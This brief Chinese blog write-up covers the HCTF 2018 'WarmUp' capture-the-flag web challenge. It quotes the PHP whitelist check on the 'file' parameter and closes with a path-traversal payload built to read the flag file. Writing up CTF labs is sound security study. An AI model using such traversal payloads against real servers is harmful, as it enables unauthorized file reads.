[HCTF 2018]WarmUp

[HCTF 2018]WarmUp

打开看到什么也没有提示,f12查看网页源代码

image20230916095441004

看到到了source.php,进行访问

image20230916095604364

看到了一大串的php代码,尝试进行解读

image20230916095657689

大致意思是满足三个条件会看到REQUEST['file']

if ( !empty($_REQUEST['file'])
&& is_string($_REQUEST['file'])
&& emmm::checkFile($_REQUEST['file'] )

source.php?file=source.php?/../../../../ffffllllaaaagggg

posted @ 2023-09-16 17:00  回忆的金鱼  阅读(19)  评论(0)    收藏  举报